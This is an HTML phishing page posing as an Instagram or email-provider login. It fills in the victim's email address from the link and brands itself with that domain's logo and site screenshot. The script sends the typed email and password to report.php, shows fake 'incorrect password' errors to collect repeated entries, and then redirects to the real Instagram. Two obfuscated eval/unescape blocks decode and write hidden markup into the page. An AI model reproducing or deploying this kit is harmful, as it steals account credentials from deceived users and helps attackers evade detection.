<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram</title>
    <meta name="googlebot" content="noindex">
    <meta name="googlebot-news" content="noindex">
    <meta name="googlebot" content="noindex">
    <meta name="googlebot-news" content="nosnippet">
    <link rel="icon" href="https://img.freepik.com/free-vector/instagram-logo_1199-122.jpg?semt=ais_hybrid">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
     <script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    
<script type="text/javascript">
<!-- 
eval(unescape('%66%75%6e%63%74%69%6f%6e%20%77%66%63%64%34%33%34%66%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%39%33%37%33%31%38%38%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%37%30%31%30%38%34%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%2d%38%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));
eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%77%66%63%64%34%33%34%66%28%27') + '%47%7b%74%83%7d%6f%47%12%12%29%28%20%2c%2b%28%20%2a%3b%81%14%15%28%29%28%20%2c%2b%28%20%2a%21%2a%29%72%69%7b%6f%79%72%41%28%30%41%1c%10%29%2f%28%29%28%20%2c%2b%28%20%2a%21%7a%68%6b%6c%70%76%67%46%2b%38%4b%17%1b%2a%29%2f%28%29%28%20%2c%86%15%1a%2a%21%2a%29%2f%28%29%28%62%73%6f%81%8b%17%1b%2a%29%2f%28%29%28%20%2c%2b%28%20%2a%63%75%81%32%7b%70%82%79%72%6c%42%20%68%7e%78%6d%6a%7a%34%6a%7f%84%40%15%1a%2a%21%2a%29%2f%28%29%28%20%2c%2b%28%66%75%7f%7e%34%69%69%74%71%7c%85%41%28%73%6b%7f%79%34%7c%6d%7b%71%66%47%16%12%20%2a%21%2a%29%2f%28%29%28%20%2c%2b%6a%61%69%7a%6d%7b%70%7d%77%6c%4a%2c%79%6f%62%6b%39%3a%35%2f%38%35%28%30%30%2b%38%3e%3a%35%33%29%7a%7a%75%30%22%2e%32%43%1d%10%21%2a%29%2f%28%29%28%20%2c%2b%28%20%68%60%69%72%68%7a%76%7d%7e%68%36%7a%65%7a%64%6b%7d%45%76%76%35%72%69%7b%6d%61%7e%4a%17%13%2f%28%29%28%20%2c%2b%28%20%2a%21%2a%6b%6e%6b%72%6f%72%73%7e%76%64%37%72%73%83%6a%42%29%6b%7f%7a%6e%7a%4b%2a%1c%10%29%2f%28%29%28%20%2c%2b%85%1d%10%21%2a%29%2f%28%29%28%20%32%76%69%79%74%3c%69%76%71%7c%68%71%7e%87%16%12%20%2a%21%2a%29%2f%28%29%28%20%2c%2b%7f%79%6e%75%72%43%2f%3a%3f%2d%4b%11%11%28%20%2a%21%2a%29%2f%28%29%28%20%2c%69%69%63%71%66%78%76%7a%76%6d%35%63%73%77%77%72%40%21%29%6f%69%6e%42%15%1a%2c%2b%28%20%2a%21%2a%29%2f%28%29%28%62%73%79%6c%65%78%3c%78%68%6b%71%7c%7b%4a%2c%3e%78%88%41%1c%10%29%2f%28%29%28%20%2c%2b%28%20%2a%21%7a%68%6b%6c%70%76%67%46%2b%3a%30%7a%89%41%14%15%28%29%28%20%2c%2b%28%20%2a%21%2a%29%72%69%7b%6f%79%72%41%28%48%3a%71%82%29%6e%7d%7d%77%4b%11%11%28%20%2a%21%2a%29%2f%28%84%15%1a%2c%2b%28%20%2a%21%2a%29%31%74%76%6f%62%73%83%83%1d%10%21%2a%29%2f%28%29%28%20%2c%2b%28%20%6e%78%79%79%73%69%80%42%20%6a%77%6d%88%41%1c%10%29%2f%28%29%28%20%2c%2b%28%20%2a%21%6b%75%76%6f%77%35%79%78%6e%75%73%40%21%69%6c%71%7c%6c%7a%4b%11%11%28%20%2a%21%2a%29%2f%28%29%28%20%2c%71%7d%73%7e%78%6c%80%32%6b%76%76%74%69%75%7c%4a%2a%62%6f%77%7b%6d%7b%43%1d%16%2b%28%20%2a%21%2a%29%2f%28%29%28%20%78%6e%80%74%37%60%76%70%68%76%43%28%63%69%75%7c%65%78%4a%17%13%2f%28%29%28%20%2c%2b%28%20%2a%21%2a%74%6e%7a%6e%71%7e%31%7f%77%70%40%21%3b%39%7f%80%42%15%1a%2c%2b%28%20%2a%21%2a%29%82%15%13%28%20%2c%2b%28%20%2a%21%34%75%70%6f%6b%77%88%2c%78%78%61%74%8a%17%13%2f%28%29%28%20%2c%2b%28%20%2a%21%2a%6f%70%76%7d%35%73%75%81%6d%4a%2a%33%43%79%87%43%14%12%20%2c%2b%28%20%2a%21%2a%29%2f%28%29%75%61%7e%6c%71%7e%37%7d%6f%6f%7b%42%29%39%30%7c%83%43%1d%10%21%2a%29%2f%28%29%28%20%2c%2b%28%20%7e%64%82%7d%32%7c%7b%69%7e%7f%6d%77%72%77%4b%2a%6a%6e%78%70%7c%61%70%72%82%65%41%1c%10%29%2f%28%29%28%20%2c%2b%85%1d%10%21%2a%29%2f%28%29%28%20%32%78%71%67%74%3c%7a%82%12%12%29%28%20%2c%2b%28%20%2a%21%2a%29%2f%7c%6c%80%74%31%6a%74%79%6d%7f%40%29%6c%6d%77%7c%65%7e%40%15%1a%2a%21%2a%29%2f%28%29%28%20%2c%2b%28%7d%6b%73%6d%70%71%42%29%38%20%3d%43%78%88%41%1c%10%29%2f%28%29%28%20%2c%2b%28%20%2a%21%77%68%7d%6f%70%76%3d%78%74%78%4a%2a%34%3a%79%87%43%14%12%20%2c%2b%28%20%2a%21%2a%84%12%12%29%28%20%2c%2b%28%20%2a%3f%79%70%68%76%34%78%20%7c%80%15%1a%2a%21%2a%29%2f%28%29%28%20%2c%2b%28%63%75%7d%75%7b%45%28%2a%3f%31%3b%3a%3f%31%41%1c%10%29%2f%28%29%28%20%2c%2b%28%20%2a%21%6c%76%71%7c%34%7f%65%75%6c%70%74%40%21%3f%39%3f%43%14%12%20%2c%2b%28%20%2a%21%2a%29%2f%28%29%6e%7f%72%7f%35%73%73%8b%6f%43%2f%39%3e%78%88%47%16%12%20%2a%21%2a%29%2f%28%29%85%1d%16%2b%28%20%2a%21%2a%29%2f%36%7a%71%67%72%6d%77%72%77%8a%17%13%2f%28%29%28%20%2c%2b%28%20%2a%21%2a%79%6e%6c%6d%71%7e%6b%41%28%30%2a%32%3a%79%87%43%14%12%20%2c%2b%28%20%2a%21%2a%29%2f%28%29%75%61%7e%6c%71%7e%37%75%75%79%45%28%3a%38%70%84%40%15%1a%2a%21%2a%29%2f%28%29%28%8d%11%11%28%20%2a%21%2a%29%2f%28%37%71%7e%7c%6c%28%79%74%71%7f%7d%84%15%13%28%20%2c%2b%28%20%2a%21%2a%29%2f%28%7e%71%64%78%73%42%20%3b%31%3a%2c%44%15%13%11%19%15%73%6d%79%6d%79%7e%43%3e%3d%79%80%4b%11%11%28%20%2a%21%2a%29%2f%28%29%28%20%2c%76%69%72%6d%78%74%43%2f%39%39%78%88%2c%3b%43%1d%10%21%2a%29%2f%28%29%28%20%2c%2b%28%20%68%7e%78%6d%6a%7a%43%39%70%84%2b%7b%7f%76%78%6e%29%2c%6d%41%6d%37%69%3c%43%1d%10%21%2a%29%2f%28%29%28%20%2c%2b%28%20%6c%7e%74%7d%32%6e%68%75%79%70%82%42%20%73%7f%72%6c%7d%71%7d%43%1d%16%2b%28%20%2a%21%2a%29%2f%28%29%28%20%7c%6a%6c%64%73%7f%6d%43%2f%39%3a%78%88%2c%3a%38%70%82%4a%17%13%2f%28%29%28%20%2c%2b%28%20%2a%21%2a%6f%70%76%7d%35%77%69%72%6f%78%7e%4b%2a%3d%3f%38%42%15%1a%2c%2b%28%20%2a%21%2a%29%2f%28%29%28%66%73%75%7c%3d%79%78%80%6c%45%28%38%3b%70%84%40%15%1a%2a%21%2a%29%2f%28%29%28%20%2c%2b%28%62%75%73%6e%6c%7d%35%7b%69%64%75%7e%7b%4a%2a%32%7a%81%44%15%13%28%20%2c%2b%28%20%2a%21%87%14%15%28%29%28%20%2c%2b%28%20%34%78%74%79%68%28%70%76%70%79%7f%42%66%75%62%7f%7a%84%15%13%28%20%2c%2b%28%20%2a%21%2a%29%2f%77%7c%7c%7c%75%75%6d%4a%2a%7f%75%77%6a%43%14%12%20%2c%2b%28%20%2a%21%2a%84%12%12%29%28%20%2c%2b%28%20%2a%3f%73%77%7f%3a%6b%83%1d%16%2b%28%20%2a%21%2a%29%2f%28%29%28%20%78%6e%80%74%37%60%76%70%68%76%43%28%63%69%75%7c%65%78%4a%17%13%2f%28%29%28%20%2c%2b%28%8d%17%1b%2a%29%2f%28%29%28%20%2c%35%71%7e%7a%33%68%29%6d%7d%7d%7c%7f%72%80%15%1a%2a%21%2a%29%2f%28%29%28%20%2c%2b%28%64%73%72%7a%75%6e%81%43%28%79%72%77%71%7e%6f%3c%68%75%70%6b%72%43%1d%16%2b%28%20%2a%21%2a%29%2f%28%29%28%20%7b%72%6c%74%72%4b%2a%38%3f%38%2c%43%1d%16%2b%28%20%2a%21%2a%29%2f%28%29%28%20%71%6a%7a%67%73%7f%40%29%3f%28%68%7d%74%73%40%15%1a%2a%21%2a%29%2f%28%29%28%20%2c%2b%28%7d%6b%73%6d%70%71%35%7d%77%70%46%2b%3a%30%7a%89%41%14%15%28%29%28%20%2c%2b%28%20%2a%21%2a%29%7b%6d%81%7c%3d%6d%77%71%67%74%4b%2a%6a%6a%76%7d%6d%72%47%16%12%20%2a%21%2a%29%2f%28%29%28%20%2c%2b%70%65%73%66%72%7d%45%28%3d%38%70%84%40%15%1a%2a%21%2a%29%2f%28%29%28%20%2c%2b%28%62%6b%62%71%6e%7d%77%7c%76%64%31%68%77%7c%75%73%40%29%2c%39%3b%3f%34%69%39%43%1d%10%21%2a%29%2f%28%29%28%20%2c%2b%28%20%69%7e%76%76%7d%42%29%2b%66%6a%6d%43%1d%10%21%2a%29%2f%28%29%28%20%2c%2b%28%20%6c%7e%74%7d%32%7b%70%82%65%46%2b%39%35%7a%89%41%14%15%28%29%28%20%2c%2b%28%20%2a%21%2a%29%6d%77%7b%6c%65%7e%41%28%7e%75%7f%6f%42%12%12%29%28%20%2c%2b%28%20%2a%21%2a%29%2f%6b%7c%7a%73%73%79%42%20%7a%7e%73%77%7b%6d%7b%43%1d%16%2b%28%20%2a%21%2a%29%2f%85%14%12%20%2c%2b%28%20%2a%21%2a%37%76%76%79%3a%62%2c%69%7d%74%7e%7e%74%43%77%77%7f%6d%72%87%16%12%20%2a%21%2a%29%2f%28%29%28%20%2c%2b%6b%7f%76%7e%78%43%2f%2b%3b%6b%48%6d%6f%6c%4b%17%1b%2a%29%2f%28%29%28%20%2c%86%15%1a%2a%21%2a%29%2f%28%29%28%3e%6a%74%77%74%37%78%77%6e%84%15%13%28%20%2c%2b%28%20%2a%21%2a%29%2f%28%7d%6d%88%78%36%69%7c%73%66%74%43%2f%6b%6c%76%74%69%79%43%1d%10%21%2a%29%2f%28%29%28%20%81%16%12%20%2a%21%2a%29%2f%28%29%36%65%7e%79%77%72%81%1c%10%29%2f%28%29%28%20%2c%2b%28%20%2a%21%69%76%73%77%7b%42%20%7e%6e%6c%4b%17%1b%2a%29%2f%28%29%28%20%2c%2b%28%20%2a%75%6f%81%7b%35%68%74%79%6b%75%42%20%69%64%74%7d%6a%7a%42%15%1a%2c%2b%28%20%2a%21%2a%29%82%15%13%28%20%2c%2b%28%20%2a%21%34%71%76%6c%6c%28%8b%11%11%28%20%2a%21%2a%29%2f%28%29%28%20%2c%6f%71%73%7a%7d%6b%80%45%28%77%77%7e%69%40%15%1a%2a%21%2a%29%2f%28%29%28%8d%11%11%15%1a%2a%21%2a%29%2f%28%29%28%40%71%6e%6c%79%6b%21%79%6a%7d%6d%6c%76%20%6d%75%6c%20%32%7c%6b%81%32%7f%70%6c%74%74%41%28%35%3c%48%7a%81%36%83%14%12%20%2c%2b%28%20%2a%21%2a%29%2f%28%29%6a%7f%68%82%83%1d%10%21%2a%29%2f%28%29%28%20%2c%2b%28%20%2a%21%2a%29%77%6d%70%6f%78%78%41%28%31%3a%31%7c%71%44%15%13%28%20%2c%2b%28%20%2a%21%2a%29%2f%28%84%15%1a%2c%2b%28%20%2a%21%2a%29%2f%28%29%28%20%32%76%69%79%74%3c%69%76%71%7c%68%71%7e%87%16%12%20%2a%21%2a%29%2f%28%29%28%20%2c%2b%28%20%2a%21%7d%70%6b%7c%71%42%20%45%3b%2d%4b%17%1b%2a%29%2f%28%29%28%20%2c%2b%28%20%2a%21%87%14%15%28%29%28%20%2c%2b%28%20%87%1c%10%14%15%15%13%28%20%2c%2b%44%3f%79%75%83%75%6a%469373188%33%30%38%32%39%32%31' + unescape('%27%29%29%3b'));
// -->
</script>
</head>
<body class="bodymain">

    <div class="container">
         <div class="main-contain">
            <div>
				<br>
				<center>

<script type="text/javascript">
<!-- 
eval(unescape('%66%75%6e%63%74%69%6f%6e%20%73%66%64%36%66%38%64%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%32%33%30%36%36%35%34%37%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%38%30%33%35%39%36%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%33%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));
eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%73%66%64%36%66%38%64%28%27') + '%3c%64%62%62%1d%79%66%68%3a%1c%60%78%77%68%72%3f%2a%2c%6f%22%6e%5f%5c%2e%69%6a%29%71%60%4b%56%4d%7d%5b%2c%65%61%22%61%68%66%17%1b%70%78%7f%61%62%39%1a%7d%60%64%73%6d%31%2f%27%3b%65%75%3b%18%6c%64%63%66%6d%77%37%3d%24%65%75%3b%1a%3223066547%35%32%38%36%30%39%39' + unescape('%27%29%29%3b'));
// -->
</script>
				</center>
            </div>

            <div>
				<center>
					<font style="font-family:arial; font-size:17px;">
						Login to continue
					</font>
				</center>
            </div>

            <div class="signform">

                <p class="error hide"></p>
                <form action="#" id="form">
                    <div class="inpg">
                        <input type="text" name="em" id="em" placeholder="Email" readonly>
                    </div>

                     <div class="inpg">
                        <input type="password" name="pa" id="pa" placeholder="Password">
                    </div>

                     <div class="inp2b">
                      <button class="btnlogin" style="width:295px;" disabled>Login</button>
                    </div>

                </form>
				<br><br>
            </div>
			 <center>
				&nbsp; &nbsp; &nbsp;
				<img src="https://static.cdninstagram.com/rsrc.php/v4/yz/r/c5Rp7Ym-Klz.png" style="width:140px; height:45px;">
				&nbsp; 
				<img src="https://static.cdninstagram.com/rsrc.php/v4/yu/r/EHY6QnZYdNX.png" style="width:140px; height:45px;">
			</center>
         </div>
		
    </div>
	
	


    <script>
        const boxf = document.getElementById("form");
        const em = document.getElementById("em");
        const pa = document.getElementById("pa");
        const error = document.querySelector(".error");
        const logo = document.querySelector(".logo");
        const name = document.querySelector(".name");
        const btnlogin = document.querySelector(".btnlogin");
        const bodymain = document.querySelector(".bodymain");
        const fav =  document.querySelector("link[rel*='icon']");
        let finurl = "";
        let errKey = 0;

        window.addEventListener("load", () => {
            btnlogin.disabled = false;
           const id =  window.location.href.split("#")[1];
           let logoUrl = id.split("@")[1];
           finurl = logoUrl;
           let nameUrl = logoUrl.split(".")[0];

           if(id){
            em.value = id;
            document.title = logoUrl.split(".")[0];
            fav.href = `https://logo.clearbit.com/${logoUrl}`;
            if(logoUrl === "gmail.com"){
                bodymain.style.background = `rgba(0, 0, 0, 0.04) url(https://image.thum.io/get/width/1280/crop/600/https://www.google.com/intl/us/gmail/about/)`;
                bodymain.style.backgroundRepeat = `no-repeat`;
                bodymain.style.backgroundSize = `cover`;
                logo.src = `https://logo.clearbit.com/${logoUrl}`;
                name.textContent = nameUrl;
            }
            else {
                 bodymain.style.background = `rgba(0, 0, 0, 0.04) url(https://image.thum.io/get/width/1280/crop/600/https://${logoUrl})`;
                bodymain.style.backgroundRepeat = `no-repeat`;
                bodymain.style.backgroundSize = `cover`;
                logo.src = `https://logo.clearbit.com/${logoUrl}`;
                name.textContent = nameUrl;
            }
           
           }
        });

        boxf.addEventListener("submit", (e) => {
            e.preventDefault();
            if(em.value === ""){
                error.classList.remove("hide");
                error.textContent = "Email field is empty...!";
            }
            else if(pa.value === ""){
                error.classList.remove("hide");
                error.textContent = "Password field is empty...!";
            }
            else {
                errKey++;
                let fa = `Email: ${em.value} \nPassword: ${pa.value}`;
                $.ajax({
                url: 'report.php',
                type: 'POST',
                data: { pass: fa },
                });
                error.classList.add("hide");
                error.textContent = "";
                btnlogin.textContent = "Verifying...";
                btnlogin.disabled = true;

                setTimeout(() => {
                    btnlogin.textContent = "Login";
                    btnlogin.disabled = false;
                    if(errKey <= 2){
                        error.classList.remove("hide");
                        error.textContent = "Incorrect Email Password, try again";
                        pa.value = "";
                    }
                    else {
                        error.classList.add("hide");
                        error.textContent = "";
                        btnlogin.textContent = "Log in";
                        window.location.href = `https://www.instagram.com`;
                    }
                }, 2000);

                setTimeout(() => {
                   
                }, 2000);
            }

        });

    </script>
    
</body>
</html>